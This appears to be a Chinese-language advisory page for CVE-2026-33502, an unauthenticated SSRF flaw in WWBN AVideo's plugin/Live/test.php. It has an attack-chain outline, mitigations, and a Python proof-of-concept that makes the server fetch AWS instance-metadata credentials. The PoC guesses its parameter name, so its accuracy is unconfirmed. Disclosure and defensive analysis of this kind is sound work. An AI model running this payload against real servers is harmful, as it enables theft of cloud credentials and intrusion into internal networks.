CVE-2026-33502 CVSS 9.3 严重

CVE-2026-33502 AVideo未认证服务器端请求伪造漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33502

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

9.3 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0及以下版本中，存在一个未经身份验证的服务器端请求伪造（SSRF）漏洞。该漏洞位于`plugin/Live/test.php`文件中，允许任何远程用户诱导AVideo服务器向任意URL发送HTTP请求。攻击者可利用此漏洞扫描本地主机或内部网络服务，并在可达的情况下访问内部HTTP资源或云元数据端点，造成敏感信息泄露。

技术细节

该漏洞的核心原理在于WWBN AVideo的`plugin/Live/test.php`接口未能正确处理用户输入的URL参数。该接口直接将用户控制的输入用于后端HTTP请求的发起过程，未实施任何白名单验证或网络边界限制。由于漏洞位于无需身份验证的路径上，攻击者可直接构造恶意请求，将目标地址指向内网敏感服务（如127.0.0.1的本地管理端口、数据库端口）或云服务提供商的元数据端点（如AWS的169.254.169.254）。服务器充当代理，执行请求并返回响应，使得攻击者能够绕过防火墙限制，探测内网拓扑结构，读取敏感配置信息或临时凭证，严重威胁内部网络安全。此漏洞利用门槛低，危害程度高。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用WWBN AVideo平台，且版本在26.0或以下。

STEP 2

利用

攻击者向`plugin/Live/test.php`发送特制的HTTP请求，在URL参数中填入内网地址（如127.0.0.1）或云元数据地址，无需进行身份验证。

STEP 3

信息收集

AVideo服务器代为请求内网资源，将响应内容返回给攻击者。攻击者利用返回的数据探测内网服务或获取云凭证。

STEP 4

横向移动

利用获取的敏感凭证或信息，进一步攻击内部网络中的其他系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-33502 (WWBN AVideo SSRF)
# Target: WWBN AVideo <= 26.0

import requests

def check_ssrf(target_base_url):
    """
    Exploit the SSRF in plugin/Live/test.php to probe internal services.
    """
    # The vulnerable endpoint
    vulnerable_url = f"{target_base_url}/plugin/Live/test.php"
    
    # Payload to access internal metadata or a local service
    # Example: AWS Metadata service or a local admin panel
    internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    
    # Note: The parameter name 'url' might vary based on actual source code logic,
    # but 'url' is standard for SSRF vulnerabilities.
    params = {
        "url": internal_target
    }

    try:
        print(f"[*] Sending request to: {vulnerable_url}")
        print(f"[*] Testing internal access to: {internal_target}")
        
        response = requests.get(vulnerable_url, params=params, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful! The server responded with:")
            print(response.text[:500]) # Print first 500 chars of response
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost"
    check_ssrf(target)

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

如果无法立即升级，建议管理员删除或重命名受影响的`plugin/Live/test.php`文件以阻断攻击路径。同时，应在服务器层面配置防火墙规则，阻止对内网网段（如127.0.0.0/8, 10.0.0.0/8）及云元数据IP（如169.254.169.254）的访问请求，以减少漏洞被利用后的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表